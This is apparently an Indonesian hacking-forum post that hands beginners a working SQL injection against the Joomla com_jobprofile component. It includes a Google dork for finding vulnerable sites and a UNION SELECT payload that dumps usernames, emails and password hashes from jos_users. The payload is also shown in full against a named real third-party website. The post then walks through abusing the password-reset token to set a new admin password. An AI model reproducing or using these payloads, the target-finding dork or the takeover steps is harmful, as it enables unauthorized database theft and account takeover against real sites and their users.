0 Joomla SQL Injection Vulnerability

selamat siang sobat ada sdikit mainan nihh buat yg masih belajar kaya ane =))

mungkin ni exploit jadul tp masih work cuy :*

buat master lewat ajah yaahh =))

dork : inurl:"index.php?option=com_jobprofile... dork bisa di explorasi lg sesuka hati =))

§  exploit : +union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–

demo :http://www.chartercommerce.com.au/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1

§  http://www.chartercommerce.com.au/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users--

reset pass : /index.php?option=com_user&view=reset

masukin emailnya d kolom itu lalu klik submit ,,setelah itu masukan token yg di dapat td lalu klik submit...alhasil tinggal tulis password baru =)),,,

NB : kalo tokennya ada symbol $$$$ ( salt ) mendingan cari target lain karena w juga mumet ma salt piye carane buat tusbol =))